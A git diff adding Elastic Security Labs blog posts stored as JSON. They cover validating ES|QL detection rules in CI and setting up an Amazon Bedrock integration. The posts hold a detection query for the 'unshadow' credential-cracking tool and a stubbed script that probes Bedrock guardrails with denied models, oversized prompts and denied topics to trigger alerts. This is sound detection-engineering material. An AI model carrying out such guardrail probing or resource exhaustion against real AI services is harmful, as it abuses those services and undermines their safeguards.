Instead of causing the query to fail, ES|QL handles this by returning \"null\" for the unavailable fields, serving as a warning that something in the query did not execute as expected. This approach ensures the query still runs, distinguishing it from a hard failure, which occurs when the query cannot execute at all, such as when a non-existent field is referenced. \n\n\n\nThere are also helpful performance warnings that may appear. Providing a `LIMIT` parameter to the query will help address performance warnings. Note this example highlights that there is a default limit of 500 events returned. This limit may significantly increase once this feature is generally available. \n\n## Security \n\nIn an investigative workflow, security practitioners prefer to iteratively hunt for threats, which may encompass manually testing, refining, and tuning a query in the UI. Conveniently, security analysts and engineers can natively leverage ES|QL in timelines, with no need to interrupt workflows by pivoting back and forth to a different view in Kibana. You’ll receive the same errors and warnings in the same security component, which shows Elasticsearch feedback under the hood.\n\n\n\nIn some components, you will receive additional feedback based on the context of where ES|QL is implemented. One scenario is when you create an ES|QL rule using the create new rule feature under the Detection Rules (SIEM) tab.\n\n\n\nFor example, this query could easily be converted to an [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) or [KQL](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) query as it does not leverage powerful features of ES|QL like statistics, frequency analysis, or parsing unstructured data. If you want to learn more about the benefits of queries using ES|QL check out this [blog by Costin](https://www.elastic.co/blog/elasticsearch-query-language-esql), which covers performance boosts. 
In this case, we must add `metadata _id, _version, _index` to the query, which informs the UI which components to return in the results.\n\n## API calls? Of course!\n\nPrior to this section, all of the examples referenced creating ES|QL queries and receiving feedback directly from the UI. For illustrative purposes, the following examples leverage Dev Tools, but these calls are easily migratable to cURL bash commands or the language / tool of your choice that can send an HTTP request.\n\n\n\nHere is the same query as previously shown throughout other examples, sent via a POST request to the [query API](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-query-api.html) with a valid query. \n\n\n\nAs expected, if you supply an invalid query, you’ll receive similar feedback observed in the UI. In this example, we’ve also supplied the `?error_trace` flag which can provide the stack trace if you need additional context for why the query failed validation. \n\nAs you can imagine, we can use the API to programmatically validate ES|QL queries. You can also still use the [Create rule](https://www.elastic.co/guide/en/kibana/current/create-rule-api.html) Kibana API, which requires a bit more metadata associated with a security rule. However, if you want to only validate a query, the `_query` API comes in handy. 
From here you can use the [Elasticsearch Python Client](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html) to connect to your stack and validate queries.\n\n```\nfrom elasticsearch import Elasticsearch\n\nclient = Elasticsearch(...)\ndata = {\n    \"query\": \"\"\"\n    from logs-endpoint.events.*\n    | keep host.os.type, process.name, process.working_directory, event.type, event.action\n    | where host.os.type == \"linux\" and process.name == \"unshadow\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\")\n    \"\"\"\n}\n\n# Execute the query\nheaders = {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\nresponse = client.perform_request(\n    \"POST\", \"/_query\", params={\"pretty\": True}, headers=headers, body=data\n)\n```\n\n## Leverage the grammar\n\nOne of the best parts of Elastic developing in the open is that the [ANTLR ES|QL grammar](https://github.com/elastic/elasticsearch/tree/main/x-pack/plugin/esql/src/main/antlr) is also available. 
\n\n\n\nIf you’re comfortable with [ANTLR](https://www.antlr.org), you can also download the latest JAR to build a lexer and parser.\n\n```\npip install antlr4-tools # for antlr4\ngit clone git@github.com:elastic/elasticsearch.git # large repo\ncd elasticsearch/x-pack/plugin/esql/src/main/antlr # navigate to grammar\nantlr4 -Dlanguage=Python3 -o build EsqlBaseLexer.g4 # generate lexer\nantlr4 -Dlanguage=Python3 -o build EsqlBaseParser.g4 # generate parser\n```\n\nThis process will require more heavy lifting to get ES|QL validation started, but you’ll at least have a tree object that provides more granular control and access to the parsed fields.\n\n\n\nHowever, as you can see, the listeners are stubs, which means you’ll need to build in semantics _manually_ if you want to go this route.\n\n## The security rule GitHub CI use case\n\nFor our internal Elastic EQL and KQL query rule validation, we utilize the parsed abstract syntax tree (AST) objects of our queries to perform nuanced semantic validation across multiple stack versions. For example, having the AST allows us to validate proper field usage, verify new features are not used in older stack versions before being introduced, or, even more, ensure related integrations are built based on data streams used in the query. Fundamentally, local validation allows us to streamline a broader range of support for many stack features and versions. If you’re interested in seeing more of the design and rigorous validation that we can do with the AST, check out our [detection-rules repo](https://github.com/elastic/detection-rules/tree/main).\n \nIf you do not need granular access to the specific parsed tree objects and do not need to control the semantics of ES|QL validation, then out-of-the-box APIs may be all you need to validate queries. In this use case, we want to validate security detection rules using continuous integration. 
Managing detection rules through systems like GitHub helps garner all the benefits of using version control, like tracking rule changes, receiving feedback via pull requests, and more. Conceptually, rule authors should be able to create these rules (which contain ES|QL queries) locally and exercise the git rule development lifecycle. \n\nCI checks help to ensure queries still pass ES|QL validation without having to manually check the query in the UI. Based on the examples shown thus far, you have to either stand up a persistent stack and validate queries against the API, or build a parser implementation based on the available grammar outside of the Elastic stack. \n\nOne approach, using a short-lived Elastic stack rather than a managed persistent stack, is to use the [Elastic Container Project (ECP)](https://github.com/peasead/elastic-container). As advertised, this project will: \n\n_Stand up a 100% containerized Elastic stack, TLS secured, with Elasticsearch, Kibana, Fleet, and the Detection Engine all pre-configured, enabled, and ready to use, within minutes._\n\n\n\nWith a combination of: \n\n - Elastic Containers (e.g. ECP)\n - CI (e.g. GitHub Action workflow)\n - ES|QL rules\n - Automation Foo (e.g. python & bash scripts)\n\nYou can validate ES|QL rules via CI against the _latest stack version_ relatively easily, but there are some nuances involved in this approach.\n\n\n\nFeel free to check out the sample [GitHub action workflow](https://gist.github.com/Mikaayenson/7fa8f908ab7e8466178679a9a0cd9ecc) if you’re interested in a high-level overview of how it can be implemented.\n\n**Note:** if you're interested in using the GitHub action workflow, check out their documentation on using GitHub [secrets in Actions](https://docs.github.com/en/actions/security-guides/using-secrets-in-github-actions) and [setting up Action workflows](https://docs.github.com/en/actions/quickstart).\n\n## CI nuances\n\n 1. 
Any custom configuration needs to be scripted away (e.g. setting up additional policies, [enrichments](https://www.elastic.co/guide/en/elasticsearch/reference/current/match-enrich-policy-type.html), etc.). In our POC, we created a step and bash script that executed a series of POST requests to our temporary CI Elastic Stack, which created the new enrichments used in our detection rules.\n\n```\n- name: Add Enrich Policy\n  env:\n    ELASTICSEARCH_SERVER: \"https://localhost:9200\"\n    ELASTICSEARCH_USERNAME: \"elastic\"\n    ELASTICSEARCH_PASSWORD: \"${{ secrets.PASSWORD }}\"\n  run: |\n    set -x\n    chmod +x ./add_enrich.sh\n    bash ./add_enrich.sh\n```\n\n 2. Without data in our freshly deployed CI Elastic stack, there will be many `Unknown Column` issues as previously mentioned. One approach to address this is to build indices with the proper mappings for the queries to match. For example, if you have a query that searches the index `logs-endpoint.events.*`, then create an index called `logs-endpoint.events.ci`, with the proper mappings from the integration used in the query. \n \n 3. Once the temporary stack is configured, you’ll need extra logic to iterate over all the rules and validate using the `_query` API. For example, you can create a unit test that iterates over all the rules. 
We do this today by leveraging our default `RuleCollection.default()` that loads all rules in our detection-rules repo, but here is a snippet that quickly loads only ES|QL rules.\n \n\n```\n# tests/test_all_rules.py\nclass TestESQLRules:\n    \"\"\"Test ESQL Rules.\"\"\"\n\n    @unittest.skipIf(not os.environ.get(\"DR_VALIDATE_ESQL\"),\n                     \"Test only run when DR_VALIDATE_ESQL environment variable set.\")\n    def test_environment_variables_set(self):\n        collection = RuleCollection()\n\n        # Iterate over all .toml files in the given directory recursively\n        for rule in Path(DEFAULT_RULES_DIR).rglob('*.toml'):\n            # Read file content\n            content = rule.read_text(encoding='utf-8')\n            # Search for the pattern\n            if re.search(r'language = \"esql\"', content):\n                print(f\"Validating {str(rule)}\")\n                collection.load_file(rule)\n```\n\n Each rule would run through a validator method once the file is loaded with `load_file`. \n\n```\n# detection_rules/rule_validator.py\nclass ESQLValidator(QueryValidator):\n    \"\"\"Specific fields for ESQL query event types.\"\"\"\n\n    def validate(self, data: 'QueryRuleData', meta: RuleMeta) -> None:\n        \"\"\"Validate an ESQL query while checking TOMLRule.\"\"\"\n        if not os.environ.get(\"DR_VALIDATE_ESQL\"):\n            return\n\n        if Version.parse(meta.min_stack_version) < Version.parse(\"8.11.0\"):\n            raise ValidationError(f\"Rule minstack must be greater than 8.10.0 {data.rule_id}\")\n\n        client = Elasticsearch(...)\n        client.info()\n        client.perform_request(\"POST\", \"/_query\", params={\"pretty\": True},\n                               headers={\"accept\": \"application/json\",\n                                        \"content-type\": \"application/json\"},\n                               body={\"query\": f\"{self.query} | LIMIT 0\"})\n```\n\n As highlighted earlier, we can `POST` to the query API and validate given the credentials that were set as GitHub action secrets and passed to the validation as environment variables. Note that the `LIMIT 0` is intentional so that the query does not return data; it’s meant only to perform validation. 
From there, the single CI step would be a bash call to run the unit tests (e.g. `pytest tests/test_all_rules.py::TestESQLRules`). \n\n 4. Finally, CI leveraging containers may not scale well when validating many rules against multiple Elastic stack versions and configurations, especially if you would like to test on a per-commit basis. Deploying one stack took slightly over five minutes to complete; this measurement could greatly increase or decrease depending on your CI setup. \n \n## Conclusion\n\nElasticsearch's new feature, Elasticsearch Query Language (ES|QL), is a specialized query and compute engine for Elasticsearch, now in technical preview. It offers seamless integration across various Elastic services like Kibana and Timelines, with validation options for ES|QL queries. Users can validate queries through the Elastic Stack UI or API calls, receiving immediate feedback on syntax or column errors. \n\nAdditionally, ES|QL's ANTLR grammar is [available](https://github.com/elastic/elasticsearch/tree/d5f5d0908ff7d1bfb3978e4c57aa6ff517f6ed29/x-pack/plugin/esql/src/main/antlr) for those who prefer a more hands-on approach to building lexers and parsers. We’re exploring ways to validate ES|QL queries in an automated fashion, and now it’s your turn. Just know that we’re not done exploring, so check out ES|QL and let us know if you have ideas! 
We’d love to hear how you plan to use it within the stack natively or in CI.\n\nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80).\n\nCheck out these additional resources to learn more:\nLearn everything about [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html)\nCheck out the 8.11.0 release blog [introducing ES|QL](https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-11-0)\n"
+ },
+ "title": "Streamlining ES|QL Query and Rule Validation: Integrating with GitHub CI",
+ "slug": "streamlining-esql-query-and-rule-validation",
+ "date": "2023-11-17",
+ "description": "ES|QL is Elastic's new piped query language. Taking full advantage of this new feature, Elastic Security Labs walks through how to run validation of ES|QL rules for the Detection Engine.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "photo-edited-01.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-streamlining_esql_query_and_rule_validation-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_security_integrating_amazon_bedrock-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_security_integrating_amazon_bedrock-md.json
new file mode 100644
index 00000000000..637ec25ceae
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_security_integrating_amazon_bedrock-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Streamlining Security: Integrating Amazon Bedrock with Elastic\"\nslug: \"streamlining-security-integrating-amazon-bedrock\"\ndate: \"2024-11-14\"\ndescription: \"This article will guide you through the process of setting up the Amazon Bedrock integration and enabling Elastic's prebuilt detection rules to streamline your security operations.\"\nauthor:\n - slug: shashank-k-s\nimage: \"Security Labs Images 36.jpg\"\ncategory:\n - slug: security-research\n---\n\n# Preamble\n\nIn the ever-evolving landscape of cloud computing, maintaining robust security while ensuring compliance is a critical challenge for organizations of all sizes. As businesses increasingly adopt the cloud, the complexity of managing and securing data across various platforms grows exponentially. \n\n[Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/what-is-bedrock.html), with its powerful foundation of machine learning and AI services, offers a scalable, secure environment for organizations to develop and deploy intelligent applications. However, to fully harness the potential of these innovations, it’s essential to implement a streamlined approach to security and compliance.\n\nIntegrating Elastic with Amazon Bedrock can significantly enhance security monitoring and compliance management within your cloud environment. This integration leverages Elastic’s search, observability, and security capabilities to optimize how you manage and secure applications and data hosted on Amazon Bedrock. \n\t \nElastic’s [security information and event management (SIEM) capabilities](https://www.elastic.co/security/siem) can be used to analyze logs and monitor events generated by applications running on Amazon Bedrock. 
This allows for the detection of potential security threats in real time and automated response actions to mitigate risks.\n\nThis article will guide you through the process of setting up Amazon Bedrock integration and enabling our prebuilt detection rules to streamline your security operations. We will cover the following key aspects:\n\n 1. **Prerequisites for Elastic Amazon Bedrock Integration:** Understanding the core requirements for setting up Elastic Amazon Bedrock integration for cloud security. \n 2. **Setting Up Amazon Bedrock Integration**: Step-by-step instructions to set up Amazon Bedrock in your existing AWS infrastructure. \n 3. **Enabling Prebuilt Security Rules**: How to leverage [prebuilt rules](https://www.elastic.co/guide/en/security/current/rules-ui-management.html) to detect high-confidence policy violations and other security threats. \n 4. **Exploring High-Confidence Misconduct Blocks Detection:** An in-depth look at a specific prebuilt rule designed to detect high-confidence misconduct blocks within Amazon Bedrock logs. \n 5. **Demonstrate an Exploit Case Scenario for Amazon Bedrock:** Using a sample Python script to simulate interactions with an Amazon Bedrock model for testing exploit scenarios that could trigger Elastic prebuilt detection rules.\n\n# Prerequisites for Elastic Amazon Bedrock Integration\n\n## Elastic Integration for Amazon Bedrock\n\nThe Amazon Bedrock integration collects Amazon Bedrock model invocation logs and runtime metrics with Elastic Agent. 
For a deeper dive on the integration, refer to our [documentation](https://www.elastic.co/docs/current/integrations/aws_bedrock).\n\nBelow is the list of prerequisites for a complete and successful configuration of the Amazon Bedrock Elastic integration:\n\n * AWS Account Setup \n * Elastic Cloud Requirements \n * Terraform (Optional)\n\n### AWS Account Setup\n\n * **Active AWS Account**: Ensure you have an active AWS account with the appropriate permissions to deploy and manage resources on Amazon Bedrock. \n * **Amazon Bedrock Setup**: Confirm that Amazon Bedrock is correctly configured and operational within your AWS environment. This includes setting up AI models, datasets, and other resources necessary for your applications. Refer to [Getting started with Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/getting-started.html) for additional information on the setup. \n * **IAM Roles and Permissions**: Create or configure Identity and Access Management (IAM) roles with the necessary permissions to allow Elastic to access Amazon Bedrock resources. These roles should have sufficient privileges to read logs, metrics, and traces from AWS services. Additional details of the requirements can be found in our [AWS documentation](https://www.elastic.co/docs/current/integrations/aws#requirements). \n\n### Elastic Cloud Requirements\n\n| [Version](https://www.elastic.co/docs/current/integrations/aws_bedrock#changelog) | 0.7.0 (Beta) |\n| :---- | :---- |\n| **Compatible Kibana version(s)** | 8.13.0 or higher for integration version 0.2.0 and above. 
Minimum Kibana Version 8.12.0 |\n| [**Supported Serverless project types**](https://www.elastic.co/docs/current/integrations/serverless/support) | Security, Observability |\n| [**Subscription level**](https://www.elastic.co/subscriptions) | Basic |\n| [**Level of support**](https://www.elastic.co/docs/current/integrations/support) | Elastic |\n\n**Note:** Since the integration is in the Beta release stage, please enable ***Display Beta Integrations*** in the browse integrations section of the Management pane in your Elastic Stack.\n\n\n\n### Terraform\n\n[Terraform](https://www.terraform.io/) is an open source infrastructure-as-code (IaC) tool created by HashiCorp that allows you to define, provision, and manage cloud and on-premises infrastructure in a consistent and repeatable way.\n\nThis step is optional but recommended, as the next sections of the article use this tool to set up the required AWS infrastructure. Installation details and documentation can be found [here](https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli).\n\n# Setting Up Amazon Bedrock Integration\n\nIn this section of the article, we will walk through the steps to set up Amazon Bedrock integration with Elastic in two parts: \n\n 1. **Setting Up AWS Infrastructure with Terraform**: We'll walk through the steps to set up AWS infrastructure using Terraform. We'll create an S3 bucket, an EC2 instance with the necessary IAM roles and policies to access the S3 bucket, and configure security groups to allow SSH access. This setup is ideal for scenarios where you need an EC2 instance to interact with S3, such as for data processing or storage. \n 2. **Elastic Agent and Integration Setup**: We'll walk through the steps to install Elastic Agent on the AWS EC2 instance and configure the Amazon Bedrock integration. 
\n\n### Setting Up AWS Infrastructure with Terraform\n\nThe high-level configuration process will involve the following steps:\n\n 1. Configuring ```providers.tf``` \n 2. Configuring ```variables.tf``` \n 3. Configuring ```outputs.tf``` \n 4. Configuring ```main.tf```\n\nThe ```providers.tf``` file typically contains the configuration for any Terraform providers you are using in your project. In our example, it includes the configuration for the AWS provider. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-providers-tf) of our ```providers.tf``` file. The ```profile``` mentioned in ```providers.tf``` should be configured in the user’s AWS credentials file (```~/.aws/credentials```). Refer to [Configuration and credential file settings \- AWS Command Line Interface](https://docs.aws.amazon.com/cli/v1/userguide/cli-configure-files.html#cli-configure-files-format-profile), which is also highlighted in the credential section of Elastic’s [AWS documentation](https://www.elastic.co/docs/current/integrations/aws#aws-credentials).\n\nThe ```variables.tf``` file contains the variable definitions used throughout your Terraform configuration. For our scenario, it includes the definitions for aws\_region and resource\_labels. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-variables-tf) of our ```variables.tf``` file.\n\nThe ```outputs.tf``` file typically contains the output definitions for your Terraform configuration. These outputs can be used to display useful information after your infrastructure is provisioned. 
Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-outputs-tf) of our ```outputs.tf``` file.\n\nThe ```main.tf``` file contains the collection of all of these resources: data sources, the S3 bucket and bucket policy, the Amazon Bedrock model invocation log configuration, the SQS queue configuration, the IAM role and policies required by the EC2 instance that will install Elastic Agent and stream logs, and the Amazon Bedrock Guardrail configuration. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-main-tf) of our ```main.tf``` file.\n\nOnce ```main.tf``` is configured according to the requirements, we can initialize, plan, and apply the Terraform configuration.\n\n```\nterraform init    # initializes the directory and sets up state files in the backend\nterraform plan    # creates an execution plan\nterraform apply   # applies the configuration (the execution step)\n```\n\nTo tear down the infrastructure that Terraform previously created, use the ```terraform destroy``` command.\n\nOnce the infrastructure setup is completed, the necessary resource identifiers are provided via ```outputs.tf```. We can conduct a basic verification of the infrastructure created using the following steps: \n\n 1. Verify the S3 bucket created by Terraform: either use the AWS CLI command reference [list-buckets — AWS CLI 1.34.10 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/list-buckets.html) or navigate via the AWS console to verify the same. \n 2. Verify the SQS queue created by Terraform: either use the AWS CLI command reference [list-queues — AWS CLI 1.34.10 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/list-queues.html) or navigate via the AWS console to verify the same. \n 3. 
Verify the EC2 instance from the AWS console, connect to the ec2-instance via [Connect using EC2 Instance Connect \- Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html#ec2-instance-connect-connecting-console), and run ```aws s3 ls example-bucket-name``` to check if the instance has access to the created S3 bucket. \n 4. Verify the Amazon Bedrock Guardrail created by Terraform: either use the Amazon Bedrock API [ListGuardrails \- Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/APIReference/API_ListGuardrails.html) or navigate via the AWS console to verify the same.\n\n### Setting Up Elastic Agent and Integration\n\nTo install Elastic Agent on the AWS EC2 instance and configure the Amazon Bedrock integration, create an agent policy using the guided steps in [Elastic Agent policies | Fleet and Elastic Agent Guide \[8.15\]](https://www.elastic.co/guide/en/fleet/current/agent-policy.html). Then log in to the ec2-instance created in the infrastructure setup steps via [Connect using EC2 Instance Connect \- Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html#ec2-instance-connect-connecting-console), and install the Elastic Agent using the guided steps in [Install Elastic Agents | Fleet and Elastic Agent Guide \[8.15\]](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). During the agent installation, remember to select the agent policy created at the beginning of this setup process and use the relevant agent installation method depending on the instance created. 
Finally, ensure the agent is properly configured and there is incoming data from the agent.\n\nTo configure the Amazon Bedrock integration in the newly created policy, add the Amazon Bedrock integration using the guided steps: [Add an Elastic Agent integration to a policy](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html). Enable Beta Integrations to use the Amazon Bedrock integration as displayed in the image below. \n\n\n\nConfigure the integration with AWS access keys to access the AWS account where Amazon Bedrock is configured. Use the Collect Logs from S3 Bucket option and specify the bucket ARN created in the setup step. Please note to use either the S3 bucket or the SQS queue URL during the setup, *not both*. Add this integration to the existing policy where the ec2-instance is configured. \n\n\n\n### Verify Amazon Bedrock Model Invocation Log Ingestion\n\nOnce the Elastic Agent and integration setup is completed, we can conduct a basic verification of the integration to determine if the logs are being ingested as expected by using the following example API call: \n\n```\naws bedrock-runtime converse \\\n--model-id \"anthropic.claude-3-5-sonnet-20240620-v1:0\" \\\n--messages '[{\"role\":\"user\",\"content\":[{\"text\":\"Hello \"}]}]' \\\n--inference-config '{\"maxTokens\":2000,\"stopSequences\":[],\"temperature\":1,\"topP\":0.999}' \\\n--additional-model-request-fields '{\"top_k\":250}' \\\n--region us-east-1\n```\n\nThe example API call assumes a working AWS CLI setup and access to the foundation model [Anthropic Claude Messages API \- Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/model-parameters-anthropic-claude-messages.html). 
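\n\nThe same request can also be issued from Python through the ```converse``` API in the boto3 ```bedrock-runtime``` client. The sketch below only builds the request parameters shown in the CLI example above (the helper name is ours; actually sending the request requires working AWS credentials and model access, so the client call is left commented out):\n\n```py\ndef build_converse_kwargs():\n    # Mirror the CLI example above: model, message, and inference settings\n    return {\n        \"modelId\": \"anthropic.claude-3-5-sonnet-20240620-v1:0\",\n        \"messages\": [{\"role\": \"user\", \"content\": [{\"text\": \"Hello \"}]}],\n        \"inferenceConfig\": {\"maxTokens\": 2000, \"stopSequences\": [], \"temperature\": 1, \"topP\": 0.999},\n        \"additionalModelRequestFields\": {\"top_k\": 250},\n    }\n\n# import boto3\n# client = boto3.client(\"bedrock-runtime\", region_name=\"us-east-1\")\n# response = client.converse(**build_converse_kwargs())\n```\n\n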
If the user does not have access to the model, one can simply request access from the model access page as suggested in [Access Amazon Bedrock foundation models](https://docs.aws.amazon.com/bedrock/latest/userguide/model-access.html), or optionally change the API call to any existing model the user can access. \n\nOn successful execution of the above API call, the Amazon Bedrock model invocation logs are populated, and in Kibana ```logs-aws_bedrock.invocation-default``` should be populated with those invocation logs. We can use the following simple ES|QL query to return recently ingested events.\n\n```\nfrom logs-aws_bedrock.invocation-* | LIMIT 10\n```\n\n# Enable Prebuilt Detection Rules\n\nTo enable prebuilt detection rules, first log in to the Elastic instance and, from the left navigation pane, navigate to Security → Rules → Detection rules (SIEM). Filter for “Data Source: Amazon Bedrock” in the tags section. \n\nEnable the available prebuilt rules. For prebuilt rules, the Setup information contains a helper guide to set up AWS Guardrails for Amazon Bedrock, which is accomplished in the Setting Up AWS Infrastructure with Terraform step if the example is followed correctly and the Terraform includes the Amazon Bedrock Guardrail configuration. Please note this setup is vital for some of the rules to generate alerts; if it was skipped in the infrastructure setup stage, ensure the guardrail is set up accordingly.\n\n\n\n# Exploring High-Confidence Misconduct Blocks Detection\n\nLet’s simulate a real-world scenario in which a user queries a topic denied to the Amazon Bedrock model. Navigate to the Amazon Bedrock section in the AWS console, and use the left navigation pane to navigate to the Guardrails subsection under Safeguards. 
Use the sample guardrail created during our setup instructions for this exercise, and use the test option to run a model invocation with the guardrails and query the denied topic configured.\n\n\n\nRepeat the query at least six times, as the prebuilt rule is designed to alert on more than five high-confidence blocks. When the alert schedule runs, we can see an alert populate for ```Unusual High Confidence Misconduct Blocks Detected```.\n\n\n\n# Demonstrate an Exploit Case Scenario for Amazon Bedrock\n\nTo simulate an Amazon Bedrock security bypass, we need an exploit simulation script to interact with Amazon Bedrock models. The exploit script example we provide simulates the following attack pattern: \n\n * Attempts multiple successive requests to use denied model resources within AWS Bedrock \n * Generates multiple successive validation exception errors within Amazon Bedrock \n * Consistently generates high input token counts, submits numerous requests, and receives large responses that mimic patterns of resource exhaustion \n * Combines repeated high-confidence 'BLOCKED' actions coupled with specific violation codes such as 'MISCONDUCT', indicating persistent misuse or attempts to probe the model's ethical boundaries\n\n```py\nclass BedrockModelSimulator:\n    def __init__(self, profile_name, region_name):\n        # Create a boto3 session client for interaction\n\n    def generate_args_invoke_model(self, model_id, user_message, tokens):\n        # Generate model invocation parameters\n        guardrail_id = <>\n        guardrail_version = <>\n\n        guardrail_config = {\n            \"guardrailIdentifier\": guardrail_id,\n            \"guardrailVersion\": guardrail_version,\n            \"trace\": \"enabled\"\n        }\n        conversation = [\n            {\n                \"role\": \"user\",\n                \"content\": [{\"text\": user_message}],\n            }\n        ]\n        inference_config = {\"maxTokens\": tokens, \"temperature\": 0.7, \"topP\": 1}\n        additional_model_request_fields = {}\n\n        kwargs = {\n            \"modelId\": model_id,\n            \"messages\": conversation,\n            \"inferenceConfig\": inference_config,\n            \"additionalModelRequestFields\": additional_model_request_fields,\n            \"guardrailConfig\": guardrail_config\n        }\n        return kwargs\n\n    def invoke_model(self, invocation_arguments, count):\n        for _ in range(count):\n            try:\n                # Invoke the model with the right invocation_arguments\n            except ClientError as e:\n                # Handle the error message\n\ndef main():\n    profile_name = <>\n    region_name = 'us-east-1'\n    attempt_count = 10  # illustrative number of repeated attempts\n    denied_model_id = <>  # use a denied model\n    denied_model_user_message = <>  # sample message\n    available_model_id = <>  # use an available model\n    validation_exception_user_message = <>  # sample message\n    resource_exploit_user_message = <>  # a very large message for resource exhaustion\n    denied_topic_user_message = <>  # sample message that queries the configured denied topic\n    simulator = BedrockModelSimulator(profile_name, region_name)\n    denied_model_invocation_arguments = simulator.generate_args_invoke_model(denied_model_id, denied_model_user_message, 200)\n    simulator.invoke_model(denied_model_invocation_arguments, attempt_count)\n    validation_exception_invocation_arguments = simulator.generate_args_invoke_model(available_model_id, validation_exception_user_message, 6000)\n    simulator.invoke_model(validation_exception_invocation_arguments, attempt_count)\n    resource_exhaustion_invocation_arguments = simulator.generate_args_invoke_model(available_model_id, resource_exploit_user_message, 4096)\n    simulator.invoke_model(resource_exhaustion_invocation_arguments, attempt_count)\n    denied_topic_invocation_arguments = simulator.generate_args_invoke_model(available_model_id, denied_topic_user_message, 4096)\n    simulator.invoke_model(denied_topic_invocation_arguments, attempt_count)\n\nif __name__ == \"__main__\":\n    main()\n```\n\n**Note:** The GUARDRAIL\_ID and GUARDRAIL\_VERSION can be found in ```outputs.tf```. \n\nWhen executed in a controlled environment, the provided script simulates an exploit scenario that would generate detection alerts in Elastic Security. 
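\n\nAs a rough illustration of the detection logic behind the prebuilt rule discussed earlier (not the actual rule, which runs as a query against ```logs-aws_bedrock.invocation-*```; the field names and records below are simplified and hypothetical), counting high-confidence 'MISCONDUCT' blocks per user and flagging more than five could be sketched as:\n\n```py\nfrom collections import Counter\n\n# Simplified, hypothetical log records; real invocation logs carry many more fields\nevents = [\n    {\"user\": \"alice\", \"action\": \"BLOCKED\", \"confidence\": \"HIGH\", \"type\": \"MISCONDUCT\"}\n] * 6 + [\n    {\"user\": \"bob\", \"action\": \"BLOCKED\", \"confidence\": \"HIGH\", \"type\": \"MISCONDUCT\"}\n]\n\nblocks = Counter(\n    e[\"user\"]\n    for e in events\n    if e[\"action\"] == \"BLOCKED\" and e[\"confidence\"] == \"HIGH\" and e[\"type\"] == \"MISCONDUCT\"\n)\nalerts = [user for user, n in blocks.items() if n > 5]  # rule threshold: more than 5 blocks\n```\n\n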
When these alerts are analyzed with the Elastic Attack Discovery feature, it surfaces attack chains that show the relationships between the various alerts, giving analysts a clear understanding of how multiple alerts might be part of a larger attack.\n\n\n\n# Conclusion\n\nIntegrating Elastic with Amazon Bedrock empowers organizations to maintain a secure and compliant cloud environment while maximizing the benefits of AI and machine learning. By leveraging Elastic’s advanced security and observability tools, businesses can proactively detect threats, automate compliance reporting, and gain deeper insights into their cloud operations. Increasingly, enterprises rely on opaque data sources and technologies to reveal the most serious threats. Our commitment to transparent security is evident in our open artifacts, integrations, and source code."
+ },
+ "title": "Streamlining Security: Integrating Amazon Bedrock with Elastic",
+ "slug": "streamlining-security-integrating-amazon-bedrock",
+ "date": "2024-11-14",
+ "description": "This article will guide you through the process of setting up the Amazon Bedrock integration and enabling Elastic's prebuilt detection rules to streamline your security operations.",
+ "author": [
+ {
+ "slug": "shashank-k-s"
+ }
+ ],
+ "image": "Security Labs Images 36.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-streamlining_security_integrating_amazon_bedrock-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-testing_okta_visibility_and_detection_dorothy-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-testing_okta_visibility_and_detection_dorothy-md.json
new file mode 100644
index 00000000000..aff9058ab7b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-testing_okta_visibility_and_detection_dorothy-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
